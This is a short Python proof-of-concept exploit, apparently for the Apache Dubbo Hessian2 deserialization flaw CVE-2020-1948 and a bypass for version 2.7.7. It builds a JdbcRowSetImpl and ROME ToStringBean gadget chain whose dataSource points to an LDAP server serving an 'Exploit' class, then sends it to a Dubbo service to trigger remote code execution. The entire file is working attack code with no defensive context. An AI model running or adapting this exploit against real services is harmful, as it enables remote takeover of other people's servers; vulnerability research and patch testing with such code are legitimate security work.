    exp.py
    992 B / 2021-07-04 19:32:24
    from dubbo.codec.hessian2 import Decoder, new_object
    from dubbo.client import DubboClient
    import sys
    
    client = DubboClient('127.0.0.1', int(sys.argv[1]))
    
    JdbcRowSetImpl=new_object(
          'com.sun.rowset.JdbcRowSetImpl',
          dataSource="ldap://127.0.0.1:1389/Exploit",
          strMatchColumns=["foo"]
          )
    JdbcRowSetImplClass=new_object(
          'java.lang.Class',
          name="com.sun.rowset.JdbcRowSetImpl",
          )
    toStringBean=new_object(
          'com.rometools.rome.feed.impl.ToStringBean',
          beanClass=JdbcRowSetImplClass,
          obj=JdbcRowSetImpl
          )
    # POC 1 CVE-2020-1948
    # resp = client.send_request_and_return_response(
    #     service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
    #     method_name='rce',
    #     args=[toStringBean])
    # 2.7.7 bypass
    resp = client.send_request_and_return_response(
        service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
        method_name=[toStringBean],
        service_version='1.0.0',
        args=[])
    
    
    print(resp)
    
    